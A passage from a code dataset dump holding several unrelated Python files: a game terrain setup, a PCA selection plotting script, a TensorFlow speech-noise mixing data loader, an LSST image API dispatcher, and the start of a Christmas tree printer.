для иных есть sokr\"\"\"\n\n sev_stone = piano(\"Seven\") \n sev_stone.set_pokereaction(\"to_act\", start_dial(D1,D2,0))\n \n day_stone = piano(\"Days\")\n day_stone.set_pokereaction(\"to_act\", start_dial(D1,D2,1))\n \n of_stone = piano(\"Of\")\n of_stone.set_pokereaction(\"to_act\", start_dial(D1,D2,2))\n\n metallic = stand(\"Gate\")\n metallic.set_pokereaction(\"to_act\", start_dial(D1,D2,3))\n\n lever1 = stand(\"Lever\")\n lever1.set_pokereaction(\"to_act\", start_dial(D1,D2,4))\n\n lever2 = stand(\"Lever\")\n lever2.set_pokereaction(\"to_act\", start_dial(D1,D2,5))\n\n well = stand(\"Well\")\n well.set_pokereaction(\"to_act\", start_dial(D1,D2,12))\n\n #Созидание местностей (в принципе, многих, но тут одна)\n\n area = [None]*1\n\n # Удивительно, но init (технически) можно объединить с reinit-ом.\n area[0] = Terrain(15, 5, rag('ground'), stand('Tree'))\n \n #1 #2 #3 #4 #5\n area[0].reinit([[1, 0, 0, 0, 1], # 1\n [0, 0, 2, 0, 0], # 2\n [0, 0, 0, 0, 0], # 3\n [0, 1, 0, 1, 1], # 4\n [1, 1, 4, 1, 1], # 5\n [3, 1, 4, 1, 5], # 6\n [0, 0, 0, 0, 0], # 7\n [1,10,12, 1, 1], # 8\n [0, 9,11, 1, 1], # 9\n [0, 0, 0, 0, 0], # 10\n [1, 1, 1, 1, 0], # 11\n [0, 0, 0, 0, 0], # 12\n [0, 6, 7, 8, 0], # 13\n [0, 0, 0, 0, 1], # 14\n [1, 1, 0, 0, 1]], # 15\n\n [rag('ground'), #0\n stand('Tree'), #1\n well, #2\n lever1, #3\n metallic, #4\n lever2, #5\n sev_stone, #... \n day_stone,\n of_stone,\n rag('press'),\n rag('A'),\n rag('to'),\n rag('interact')])\n\n return area\n","sub_path":"terrain_tutorialup.py","file_name":"terrain_tutorialup.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"60623059","text":"from typing import List\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport os\n\nsns.set_style(\"white\")\nplt.rc('font', family='serif')\n\nabsolute_dir = \"/Users/Stanley/Desktop/Tyrrell Lab/\" \\\n \"ROP Project/PCA-Clustering-Project/results/\"\n\n\ndef get_pc_selection_dfs(dataset_used: str) -> list:\n \"\"\"Return list of DataFrames for Selection Methods for Number of Principal\n Components.\n \"\"\"\n # Get Paths to Selection Dfs\n paths = []\n for root, dirs, files in os.walk(absolute_dir+\"pc_selection\",\n topdown=False):\n for name in files:\n paths.append(os.path.join(root, name))\n paths_series = pd.Series(paths)\n idx = paths_series.str.contains(dataset_used)\n paths_series = paths_series[idx].reset_index(drop=True)\n\n # Get dataframes for pcs selected\n dfs = []\n for path in paths_series:\n dfs.append(pd.read_csv(path))\n\n return dfs\n\n\n# Divide by Max Number of PCs\ndef divide_by_max_pcs(x):\n return x/min(x[\"sample_size\"], 512)\n\n\n# PLOT Selection Methods\ndef plot_selection_methods(dfs: List[List[pd.DataFrame]]) -> None:\n \"\"\"Create Plots for selection methods for number of principal components to\n keep.\"\"\"\n\n # Plot Prep.\n x_tick_labels = list(set(dfs[0][0].sample_size))\n x_tick_labels.sort()\n x_ticks = np.array(list(range(1, len(x_tick_labels)+1))*4).reshape(\n len(x_tick_labels), 4).transpose().flatten()\n x_tick_loc = list(range(1, len(x_tick_labels)+1))\n\n # 1) Plot Percent Variance -based Methods of Selection\n fig_1 = plt.figure()\n fig_1.subplots_adjust(wspace=0)\n fig_1.set_tight_layout(True)\n ax1 = fig_1.add_subplot(131)\n ax2 = fig_1.add_subplot(132, sharey=ax1)\n ax3 = fig_1.add_subplot(133, sharey=ax1)\n\n ax1.set_title(\"Bone Age\")\n ax1.set_ylabel(\"Suggested Number 
of PCs\")\n ax1.set_ylim([0, 450])\n ax1.set_xticks(x_tick_loc)\n ax1.set_xticklabels(x_tick_labels, rotation=315)\n\n ax1.scatter(x=x_ticks, y=dfs[0][0][\"Cum. Perc. Var. (0.8)\"],\n c=\"r\", s=15, alpha=0.5, label=\"CPV >= 0.8\")\n\n ax1.scatter(x_ticks, dfs[0][0][\"Cum. Perc. Var. (0.99)\"],\n c=\"g\", s=15, alpha=0.5, label=\"CPV >= 0.99\")\n\n ax1.scatter(x_ticks, dfs[0][0][\"Minimum Mode CV\"],\n c=\"orange\", s=15, marker=\"^\", alpha=0.5, label=\"Min. Mode\")\n\n ax2.set_title(\"PSP Plates\")\n ax2.set_xlabel(\"Sample Size\", labelpad=10)\n ax2.set_xticks(x_tick_loc)\n ax2.set_xticklabels(x_tick_labels, rotation=315)\n\n ax2.scatter(x=x_ticks, y=dfs[1][0][\"Cum. Perc. Var. (0.8)\"],\n c=\"r\", s=15, alpha=0.5, label=\"CPV >= 0.8\")\n\n ax2.scatter(x_ticks, dfs[1][0][\"Cum. Perc. Var. (0.99)\"],\n c=\"g\", s=15, alpha=0.5, label=\"CPV >= 0.99\")\n\n ax2.scatter(x_ticks, dfs[1][0][\"Minimum Mode CV\"],\n c=\"orange\", s=15, marker=\"^\", alpha=0.5, label=\"Min. Mode\")\n\n # Plot Prep.\n x_tick_labels = list(set(dfs[2][0].sample_size))\n x_tick_labels.sort()\n x_ticks = []\n for i in range(len(x_tick_labels)):\n x_ticks += 4 * [i+1]\n x_tick_loc = list(range(1, len(x_tick_labels)+1))\n\n ax3.set_title(\"CIFAR 10\")\n ax3.set_xticks(x_tick_loc)\n ax3.set_xticklabels(x_tick_labels, rotation=315)\n\n ax3.scatter(x=x_ticks, y=dfs[2][0][\"Cum. Perc. Var. (0.8)\"],\n c=\"r\", s=15, alpha=0.5, label=\"CPV >= 0.8\")\n\n ax3.scatter(x_ticks, dfs[2][0][\"Cum. Perc. Var. (0.99)\"],\n c=\"g\", s=15, alpha=0.5, label=\"CPV >= 0.99\")\n\n ax3.scatter(x_ticks, dfs[2][0][\"Minimum Mode CV\"],\n c=\"orange\", s=15, marker=\"^\", alpha=0.5, label=\"Min. Mode\")\n\n plt.setp(ax2.get_yticklabels(), visible=False)\n plt.setp(ax3.get_yticklabels(), visible=False)\n ax1.legend(shadow=True, loc=\"upper left\")\n\n\n# PLOT CV vs. Random Seed\ndef plot_cv_random_seed(dataset_used: str,\n dfs: list, sample_sizes: list) -> None:\n \"\"\"Create plots for CV vs. 
Random Seed for each sample size.\"\"\"\n df_cv_random = pd.DataFrame()\n random_seeds = [1969, 1974, 2000, 2001]\n df_cv_random[\"sample_size\"] = dfs[0][\"sample_size\"]\n for i in range(len(dfs)):\n df_cv_random[str(random_seeds[i])] = dfs[i][\"Minimum Mode CV\"]\n\n for size in np.unique(sample_sizes):\n idx = df_cv_random.sample_size == size\n plt.figure()\n for seed_idx in range(len(random_seeds)):\n plt.scatter([seed_idx]*4,\n df_cv_random.loc[idx][str(random_seeds[seed_idx])],\n alpha=0.3, c=\"midnightblue\")\n\n plt.xticks(list(range(4)), labels=random_seeds)\n plt.ylabel(\"Number of PCs Suggested\")\n plt.xlabel(\"Random Seed\")\n plt.title(f\"{dataset_used} | CV-based selection for {size} \" + \\\n \"training samples\")\n # plt.ylim([0, 450])\n plt.ylim([0, 1])\n plt.show()\n\n\nif __name__ == \"__main__\":\n # Get Dataset Choice\n # dataset_choice = int(\n # input(\"DATASET: ** 1: boneage, 2: psp_plates, 3: cifar\\n\"))\n\n all_dfs = []\n\n for dataset_choice in [1, 2, 3]:\n if dataset_choice == 1:\n dataset_used = \"boneage\"\n sample_sizes = [300] * 4\n sample_sizes += [700] * 4\n sample_sizes += [5674] * 4\n sample_sizes += [2837] * 4\n elif dataset_choice == 3:\n dataset_used = \"cifar10\"\n sample_sizes = [12000] * 4\n sample_sizes += [2000] * 4\n sample_sizes += [400] * 4\n sample_sizes += [8000] * 4\n sample_sizes += [800] * 4\n else:\n dataset_used = \"psp_plates\"\n sample_sizes = [100] * 4\n sample_sizes += [300] * 4\n sample_sizes += [2928] * 4\n sample_sizes += [1464] * 4\n\n # Concatenate PC Selection + Sample Sizes\n dfs = get_pc_selection_dfs(dataset_used)\n\n for df in dfs:\n df[\"sample_size\"] = sample_sizes\n df.sort_values(by=[\"sample_size\"], inplace=True, ignore_index=True)\n\n all_dfs.append(dfs)\n # Divide by max_pcs\n # dfs[0] = dfs[0].apply(divide_by_max_pcs, axis=1)\n\n plot_selection_methods(all_dfs)\n\n\n\n\n","sub_path":"scripts/plot_pc_selection.py","file_name":"plot_pc_selection.py","file_ext":"py","file_size_in_byte":6249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"302854585","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport hashlib\nimport math\nimport os.path\nimport random\nimport re\nimport sys\nimport tarfile\nimport python_speech_features\n\nimport numpy as np\nfrom six.moves import urllib\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\n\nfrom tensorflow.contrib.framework.python.ops import audio_ops as contrib_audio\nfrom tensorflow.python.ops import io_ops\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.python.util import compat\n\nMAX_NUM_WAVS_PER_CLASS = 2**27 - 1 # ~134M\nNOISE_DIR_NAME = 'noise'\nSPEECH_DIR_NAME = 'clean_speech'\nRANDOM_SEED = 59185\n\n\ndef get_spectrum(wav, win_len=320, win_shift=160, nDFT=320, win_fun=np.hanning):\n \"\"\"Get the spectrogram for given signal. 
lib 'python_speech_features' is required.\n :param wav: 1-D signal\n :param win_len: length of the signal, in samples\n :param win_shift: non-overlap portion, in samples\n :param win_fun: window function for framing, default is np.hanning\n :param mode: spectrogram for 'magnitude' or 'phase'\n :return: a matrix of size NFRAME*(NFFT/2+1), each row is the spectrum of the corresponding frame\n \"\"\"\n\n wav_np = np.array(wav).flatten()\n wav_np = np.reshape(wav_np, [len(wav_np)])\n # flatten the vector\n #wav = tf.reshape(wav, [-1])\n\n # convert int32 to int\n win_len = int(win_len)\n win_shift = int(win_shift)\n nDFT = int(nDFT)\n\n wav_frame = python_speech_features.sigproc.framesig(sig=wav_np,\n frame_len=win_len,\n frame_step=win_shift,\n winfunc=win_fun\n )\n wav_fft = np.empty([wav_frame.shape[0], int(win_len / 2 + 1)], dtype=complex)\n for frame in range(wav_frame.shape[0]):\n wav_fft[frame] = np.fft.rfft(a=wav_frame[frame], n=nDFT)\n mag_spectrum = np.abs(wav_fft)\n phase_spectrum = np.arctan2(wav_fft.imag, wav_fft.real)\n\n return mag_spectrum, phase_spectrum, wav_fft.real, wav_fft.imag\n\n\ndef which_set(filename, validation_percentage, testing_percentage):\n \"\"\"Determines which data partition the file should belong to.\n\n We want to keep files in the same training, validation, or testing sets even\n if new ones are added over time. This makes it less likely that testing\n samples will accidentally be reused in training when long runs are restarted\n for example. To keep this stability, a hash of the filename is taken and used\n to determine which set it should belong to. This determination only depends on\n the name and the set proportions, so it won't change as other files are added.\n\n It's also useful to associate particular files as related (for example words\n spoken by the same person), so anything after '_nohash_' in a filename is\n ignored for set determination. 
This ensures that 'bobby_nohash_0.wav' and\n 'bobby_nohash_1.wav' are always in the same set, for example.\n\n Args:\n filename: File path of the data sample.\n validation_percentage: How much of the data set to use for validation.\n testing_percentage: How much of the data set to use for testing.\n\n Returns:\n String, one of 'training', 'validation', or 'testing'.\n \"\"\"\n base_name = os.path.basename(filename)\n # We want to ignore anything after '_nohash_' in the file name when\n # deciding which set to put a wav in, so the data set creator has a way of\n # grouping wavs that are close variations of each other.\n hash_name = re.sub(r'_nohash_.*$', '', base_name)\n # This looks a bit magical, but we need to decide whether this file should\n # go into the training, testing, or validation sets, and we want to keep\n # existing files in the same set even if more files are subsequently\n # added.\n # To do that, we need a stable way of deciding based on just the file name\n # itself, so we do a hash of that and then use that to generate a\n # probability value that we use to assign it.\n hash_name_hashed = hashlib.sha1(compat.as_bytes(hash_name)).hexdigest()\n percentage_hash = ((int(hash_name_hashed, 16) %\n (MAX_NUM_WAVS_PER_CLASS + 1)) *\n (100.0 / MAX_NUM_WAVS_PER_CLASS))\n if percentage_hash < validation_percentage:\n result = 'validation'\n elif percentage_hash < (testing_percentage + validation_percentage):\n result = 'testing'\n else:\n result = 'training'\n return result\n\n\ndef load_wav_file(filename):\n \"\"\"Loads an audio file and returns a float PCM-encoded array of samples.\n\n Args:\n filename: Path to the .wav file to load.\n\n Returns:\n Numpy array holding the sample data as floats between -1.0 and 1.0.\n \"\"\"\n with tf.Session(graph=tf.Graph()) as sess:\n wav_filename_placeholder = tf.placeholder(tf.string, [])\n wav_loader = io_ops.read_file(wav_filename_placeholder)\n wav_decoder = contrib_audio.decode_wav(wav_loader, desired_channels=1)\n return sess.run(\n wav_decoder,\n feed_dict={wav_filename_placeholder: filename}).audio.flatten()\n\n\ndef save_wav_file(filename, wav_data, sample_rate):\n \"\"\"Saves audio sample data to a .wav audio file.\n\n Args:\n filename: Path to save the file to.\n wav_data: 2D array of float PCM-encoded audio data.\n sample_rate: Samples per second to encode in the file.\n \"\"\"\n with tf.Session(graph=tf.Graph()) as sess:\n wav_filename_placeholder = tf.placeholder(tf.string, [])\n sample_rate_placeholder = tf.placeholder(tf.int32, [])\n wav_data_placeholder = tf.placeholder(tf.float32, [None, 1])\n wav_encoder = contrib_audio.encode_wav(wav_data_placeholder,\n sample_rate_placeholder)\n wav_saver = io_ops.write_file(wav_filename_placeholder, wav_encoder)\n sess.run(\n wav_saver,\n feed_dict={\n wav_filename_placeholder: filename,\n sample_rate_placeholder: sample_rate,\n wav_data_placeholder: np.reshape(wav_data, (-1, 1))\n })\n\n\nclass AudioProcessor(object):\n \"\"\"Handles loading, partitioning, and preparing audio training data.\"\"\"\n\n def __init__(self, data_dir, validation_percentage,\n testing_percentage, model_settings):\n self.data_dir = data_dir\n self.noise_type = model_settings['noise_type']\n self.prepare_data_index(validation_percentage, testing_percentage)\n self.prepare_noise_data()\n self.prepare_processing_graph(model_settings)\n\n def prepare_data_index(self, validation_percentage, testing_percentage):\n \"\"\"Prepares a list of the samples organized by set and label.\n\n The training loop needs a list of all 
the available data, organized by\n    which partition it should belong to, and with its file name as labels.\n    This function analyzes the wave files below the `data_dir\\SPEECH_DIR_NAME`,\n    and uses a stable hash to assign it to a data set partition (validation,\n    testing, training).\n\n    Args:\n      validation_percentage: How much of the data set to use for validation.\n      testing_percentage: How much of the data set to use for testing.\n\n    Returns:\n      Dictionary containing a list of file information for each set partition,\n      and a lookup map for each class to determine its numeric index.\n\n    Raises:\n      Exception: If the folder containing speech files doesn't exist.\n      Exception: If no .wav files are found in the folder specified.\n      Exception: If any set for training, testing or validation is empty.\n    \"\"\"\n    # Make sure the shuffling and picking of unknowns is deterministic.\n    random.seed(RANDOM_SEED)\n    self.data_index = {'validation': [], 'testing': [], 'training': []}\n    speech_dir = os.path.join(self.data_dir, SPEECH_DIR_NAME)\n\n    if not os.path.exists(speech_dir):\n      raise Exception(\"The folder containing speech doesn't exist\")\n    search_path = os.path.join(self.data_dir, SPEECH_DIR_NAME, '*.wav')\n\n    for wav_path in gfile.Glob(search_path):\n      # _, word = os.path.split(os.path.dirname(wav_path))\n      # word = word.lower()\n      basename = os.path.basename(wav_path)\n      filename = os.path.splitext(basename)[0]\n      set_index = which_set(wav_path, validation_percentage, testing_percentage)\n      self.data_index[set_index].append({'file': wav_path, 'filename': filename})\n\n    # Make sure all sets aren't empty and the ordering is random.\n    for set_index in ['validation', 'testing', 'training']:\n      if not self.data_index[set_index]:\n        raise Exception('Set ' + set_index + \" is empty\")\n      random.shuffle(self.data_index[set_index])\n\n  def prepare_noise_data(self):\n    \"\"\"Searches a folder for noise audio, and loads it into memory.\n\n    It's expected that the background audio samples will be in a subdirectory\n    named 'noise' inside the 'data_dir' folder, as .wavs that match\n    the sample rate of the training data, but can be much longer in duration.\n\n    If the 'noise' folder doesn't exist, or the noise couldn't be found in the\n    folder, the function will throw an error.\n\n    NOTE: the sampling rate of noise audio should be the same as speech audio.\n    noise and speech audio should be normalized to [-1, 1]\n\n    Returns:\n      List of raw PCM-encoded audio samples of background noise.\n\n    Raises:\n      Exception: If the folder doesn't exist.\n      Exception: If noise files aren't found in the folder.\n    \"\"\"\n    self.noise_data = []\n    noise_dir = os.path.join(self.data_dir, NOISE_DIR_NAME)\n    if not os.path.exists(noise_dir):\n      raise Exception(\"The folder containing noise files doesn't exist\")\n    noise_names = self.noise_type\n    if not noise_names:\n      raise Exception(\"Must specify at least one type of noise\")\n    with tf.Session(graph=tf.Graph()) as sess:\n      wav_filename_placeholder = tf.placeholder(tf.string, [])\n      wav_loader = io_ops.read_file(wav_filename_placeholder)\n\n      # decoding result will be padded with zero if the original length is shorter than the desired length\n      wav_decoder = contrib_audio.decode_wav(wav_loader, desired_channels=1)\n      for noise_name in noise_names:\n        search_path = os.path.join(self.data_dir, NOISE_DIR_NAME, (noise_name\n                                                                   + \".wav\"))\n        if not os.path.isfile(search_path):\n          raise Exception('No wav file found for ' + noise_name)\n        wav_data = sess.run(\n            wav_decoder,\n            feed_dict = 
{wav_filename_placeholder:search_path}).audio.flatten()\n # form a with np.shape (1,n) instead of (n,) so it could be appended to the list\n #wav_data = np.reshape(wav_data, [1, len(wav_data)])\n self.noise_data.append([wav_data])\n\n def prepare_processing_graph(self, model_settings):\n \"\"\"Builds a TensorFlow graph to apply the input distortions.\n\n Creates a graph that loads a .wav file, decodes it, add the noise by given SNR,\n calculates spectrograms as input feature and output labels that feed to neural\n nets. If noise is shorter than speech, the noise will be repeated.\n\n This must be called with an active TensorFlow session running, and it\n creates multiple placeholder inputs, and one output:\n\n - wav_filename_placeholder_: Filename of the WAV to load.\n - foreground_volume_placeholder_: How loud the main clip should be.\n - time_shift_padding_placeholder_: Where to pad the clip.\n - time_shift_offset_placeholder_: How much to move the clip in time.\n - noise_data_placeholder_: PCM sample data for background noise.\n - background_volume_placeholder_: Loudness of mixed-in background.\n - mfcc_: Output 2D fingerprint of processed audio.\n\n Args:\n model_settings: Information about the current model being trained.\n \"\"\"\n desired_samples = model_settings['desired_samples']\n self.wav_filename_placeholder_ = tf.placeholder(tf.string, [], 'wav_filename_placeholder_')\n wav_loader = io_ops.read_file(self.wav_filename_placeholder_)\n wav_decoder = contrib_audio.decode_wav(\n wav_loader, desired_channels=1, desired_samples=desired_samples)\n\n audio = tf.reshape(wav_decoder.audio, [-1])\n #audio = tf.zeros(shape=[90000])\n speech_square = tf.square(audio)\n speech_energy = tf.reduce_sum(speech_square)\n\n # Mix in background noise.\n self.noise_data_placeholder_ = tf.placeholder(dtype=tf.float32, name='noise_data_ph_')\n\n # for test only\n #self.noise_data_placeholder_ = tf.zeros(shape=[40000])\n self.snr = tf.placeholder(dtype=tf.float32, name='snr')\n\n # extend the noise if it is shorter than speech\n def cond(i, extend_times, extend_noise):\n return tf.greater(extend_times, i)\n\n def body(i, extend_times, extend_noise):\n return i+1, extend_times, extend_noise.write(i, self.noise_data_placeholder_)\n\n extend_times = tf.to_int32(tf.ceil(tf.size(audio)\n /tf.size(self.noise_data_placeholder_)))\n extend_noise = tf.TensorArray(tf.float32, tf.to_int32(extend_times))\n\n #i = tf.Variable(initial_value=0, dtype=tf.int32)\n #tmp_test = tf.identity(self.noise_data_placeholder_)\n #temp_test = self.noise_data_placeholder_\n\n i, extend_times, extend_noise = tf.while_loop(cond=cond, body=body,\n loop_vars=[0, extend_times, extend_noise])\n\n extend_noise = tf.reshape(extend_noise.stack(), [-1])\n\n # randomly choose a part of the noise\n start_noise_point = tf.random_uniform(shape=[1,1], maxval=(tf.size(extend_noise)\n - tf.size(audio)), dtype=tf.int32)\n\n # start_noise_point + tf.size(audio)]\n start_noise_point = tf.reshape(start_noise_point, [-1])\n noise_rand = tf.slice(input_=extend_noise, begin=start_noise_point,\n size=[tf.size(audio)])\n\n noise_square = tf.square(noise_rand)\n noise_energy = tf.reduce_sum(noise_square)\n\n energy_ratio = tf.sqrt(speech_energy/(noise_energy*(10**(self.snr/10))))\n\n mix_ = tf.multiply(noise_rand, energy_ratio)\n mix_ = tf.add(mix_, audio)\n\n # normalize to [-1, 1]\n mix_max = tf.reduce_max(mix_)\n mix_ = tf.divide(mix_, mix_max)\n\n # get the spectrogram for clean speech and noisy speech\n '''\n self.spectrogram_mix = 
get_spectrum(tf_wav=mix_, win_len=model_settings['win_len'], \n win_shift=model_settings['win_shift'], nDFT=model_settings['nDFT'])\n self.spectrogram_speech = get_spectrum(tf_wav=audio, win_len=model_settings['win_len'],\n win_shift=model_settings['win_shift'], nDFT = model_settings['nDFT'])\n '''\n tensor_win_len = tf.Variable(initial_value=model_settings['win_len'])\n tensor_win_shift = tf.Variable(initial_value=model_settings['win_shift'])\n tensor_nDFT = tf.Variable(initial_value=model_settings['nDFT'])\n #tensor_mode = tf.Variable(initial_value='phase', dtype=tf.string)\n\n # magnitude spectrograms\n self.spectrogram_mix, self.phase_spectrogram_mix, self.mix_fft_real, self.mix_fft_imag = tf.py_func(\n func=get_spectrum, inp=[mix_, tensor_win_len, tensor_win_shift, tensor_nDFT],\n Tout=[tf.float64, tf.float64, tf.float64, tf.float64])\n\n self.spectrogram_speech, self.phase_spectrogram_speech, self.speech_fft_real, self.speech_fft_imag = tf.py_func(\n func=get_spectrum, inp=[audio, tensor_win_len, tensor_win_shift, tensor_nDFT],\n Tout=[tf.float64, tf.float64, tf.float64, tf.float64])\n\n\n # phase spectrograms for reconstruction\n '''\n self.phase_spectrogram_mix = tf.py_func(func=get_spectrum, inp=[mix_, tensor_win_len,\n tensor_win_shift, tensor_nDFT, 'phase'], Tout=tf.float64)\n self.phase_spectrogram_speech = tf.py_func(func=get_spectrum, inp=[audio, tensor_win_len,\n tensor_win_shift, tensor_nDFT, 'phase'], Tout=tf.float64)\n '''\n #self.spectrogram_mix = tf.py_func(func=get_spectrum, inp=[mix_], Tout=tf.float64)\n #self.spectrogram_speech = tf.py_func(func=get_spectrum, inp=[audio], Tout=tf.float64)\n def set_size(self, mode):\n \"\"\"Calculates the number of samples in the dataset partition.\n\n Args:\n mode: Which partition, must be 'training', 'validation', or 'testing'.\n\n Returns:\n Number of samples in the partition.\n \"\"\"\n return len(self.data_index[mode])\n\n def get_data(self, how_many, offset, snr, noise_data, model_settings, mode, sess):\n \"\"\"Gather samples from the data set, applying transformations as needed.\n\n When the mode is 'training', a random selection of samples will be returned,\n otherwise the first N clips in the partition will be used. This ensures that\n validation always uses the same samples, reducing noise in the metrics.\n\n Args:\n how_many: Desired number of samples to return. 
-1 means the entire\n        contents of this partition.\n      offset: Where to start when fetching deterministically.\n      snr: List of SNR values (in dB) at which the noise is mixed in.\n      noise_data: List of background-noise PCM arrays to mix with the speech.\n      model_settings: Information about the current model being trained.\n      mode: Which partition to use, must be 'training', 'validation', or\n        'testing'.\n      sess: TensorFlow session that was active when processor was created.\n\n    Returns:\n      Arrays holding the real and imaginary FFT parts of the noisy inputs and of\n      the clean labels (plus the sample filename when mode is 'testing').\n    \"\"\"\n    # Pick one of the partitions to choose samples from.\n    candidates = self.data_index[mode]\n    if how_many == -1:\n      sample_count = len(candidates)\n    else:\n      sample_count = max(0, min(how_many, len(candidates) - offset))\n    # Data and labels will be populated and returned.\n    num_row = sample_count * len(snr) * len(noise_data)\n\n    data_fft_real = np.zeros((num_row, model_settings['spectrogram_size']))\n    data_fft_imag = np.zeros((num_row, model_settings['spectrogram_size']))\n    label_fft_real = np.zeros((num_row, model_settings['spectrogram_size']))\n    label_fft_imag = np.zeros((num_row, model_settings['spectrogram_size']))\n\n    pick_deterministically = (mode != 'training')\n    # Use the processing graph we created earlier to repeatedly generate the\n    # final output sample data we'll use in training.\n    for i in range(offset, offset + sample_count):\n      # Pick which audio sample to use.\n      if how_many == -1 or pick_deterministically:\n        sample_index = i\n      else:\n        sample_index = np.random.randint(len(candidates))\n      sample = candidates[sample_index]\n\n      input_dict = {\n          self.wav_filename_placeholder_: sample['file'],\n      }\n\n      # generate samples for every single snr and noise type\n      for idx_snr, snr_value in enumerate(snr):\n        # cast in case an integer snr is passed in\n        snr_value = np.float32(snr_value)\n        for idx_noise, noise in enumerate(noise_data):\n          noise_reshape = noise[0].reshape([len(noise[0]), 1])\n          #print(noise_reshape.shape)\n          input_dict[self.noise_data_placeholder_] = noise_reshape\n          input_dict[self.snr] = snr_value\n          # run the graph to get the features and labels\n          spectrogram_speech, phase_speech, speech_fft_real, speech_fft_imag = sess.run(\n              [self.spectrogram_speech, self.phase_spectrogram_speech, self.speech_fft_real, self.speech_fft_imag],\n              feed_dict=input_dict)\n          spectrogram_mix, phase_mix, mix_fft_real, mix_fft_imag = sess.run(\n              [self.spectrogram_mix, self.phase_spectrogram_mix, self.mix_fft_real, self.mix_fft_imag],\n              feed_dict=input_dict)\n          idx = i - offset + sample_count * (idx_snr * len(self.noise_data) + idx_noise)\n\n          data_fft_real[idx, :] = mix_fft_real.flatten()\n          data_fft_imag[idx, :] = mix_fft_imag.flatten()\n          label_fft_real[idx, :] = speech_fft_real.flatten()\n          label_fft_imag[idx, :] = speech_fft_imag.flatten()\n\n    if mode != 'testing':\n      return data_fft_real, label_fft_real, data_fft_imag, label_fft_imag\n    else:\n      return data_fft_real, label_fft_real, data_fft_imag, label_fft_imag, sample['filename']\n","sub_path":"input_data.py","file_name":"input_data.py","file_ext":"py","file_size_in_byte":21375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"197214947","text":"#\n# LSST Data Management System\n# Copyright 2017 LSST/AURA.\n#\n# This product includes software developed by the\n# LSST Project (http://www.lsst.org/).\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will 
be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the LSST License Statement and\n# the GNU General Public License along with this program. If not,\n# see <http://www.lsstcorp.org/LegalNotices/>.\n\n\"\"\"\nThis module implements the API dispatch logic.\n\n@author: Kenny Lo, SLAC\n\n\"\"\"\n\nimport os\nimport json\n\nfrom .image_v1 import Image\nfrom .hashutil import Hasher\n\n\nclass Dispatcher(object):\n    \"\"\" Dispatcher maps a request to the corresponding Image method.\n    \"\"\"\n\n    def __init__(self, config_dir):\n        \"\"\"Load and keep a ref to the key-to-API map.\"\"\"\n        config = os.path.join(config_dir, \"api_map.json\")\n        with open(config) as json_api:\n            self.api_map = json.load(json_api)\n\n    def find_api(self, req_params):\n        \"\"\" Find the API based on its ID.\n\n        Parameters\n        ----------\n        req_params: dict\n            the parameters with values.\n\n        Returns\n        -------\n        api: function\n            the matching API method of the Image class.\n        \"\"\"\n        self._map_url_params(req_params)\n        ids = sorted(req_params.keys())\n        api_id = Hasher.hash(str(ids).encode(\"utf-8\")).hexdigest()\n        entry = self.api_map[api_id]\n        if entry:\n            mod_func = entry[\"api\"]\n            # example for api_str: 'Image.cutout'\n            mod_name, func_name = mod_func.split(\".\")\n            api = getattr(Image, func_name)\n            return api\n\n    def _map_url_params(self, req_params):\n        # map ra,dec into center.x,center.y\n        ra = req_params.pop(\"ra\", None)\n        if ra:\n            req_params[\"center.x\"] = ra\n        dec = req_params.pop(\"dec\", None)\n        if dec:\n            req_params[\"center.y\"] = dec\n        if ra or dec:\n            req_params[\"center.unit\"] = \"deg\"\n        filt = None\n        if \"run\" in req_params or \"tract\" in req_params:\n            # check for data id before renaming filter\n            pass\n        else:\n            filt = req_params.pop(\"filter\", None)\n            if filt:\n                req_params[\"filter\"] = filt\n        sid = req_params.pop(\"sid\", None)\n        if sid:\n            req_params[\"science_id\"] = sid\n        width = req_params.pop(\"width\", None)\n        if width:\n            req_params[\"size.x\"] = width\n        height = req_params.pop(\"height\", None)\n        if height:\n            req_params[\"size.y\"] = height\n        unit = req_params.pop(\"unit\", None)\n        if unit:\n            req_params[\"size.unit\"] = unit\n        patch = req_params.pop(\"patch\", None)\n        if patch:\n            patch_x, patch_y = patch.split(\",\")\n            req_params[\"patch_x\"] = patch_x\n            req_params[\"patch_y\"] = patch_y\n\n","sub_path":"python/lsst/dax/imgserv/dispatch_v1.py","file_name":"dispatch_v1.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"393694721","text":"\"\"\" This is a small HelloWorld-like program\n    to display a kind of christmas tree in\n    the command line. 
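For example, with the default height of 8 the widest\n    branch row is maxspan = (8-1)*2-1 = 13 stars wide. 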
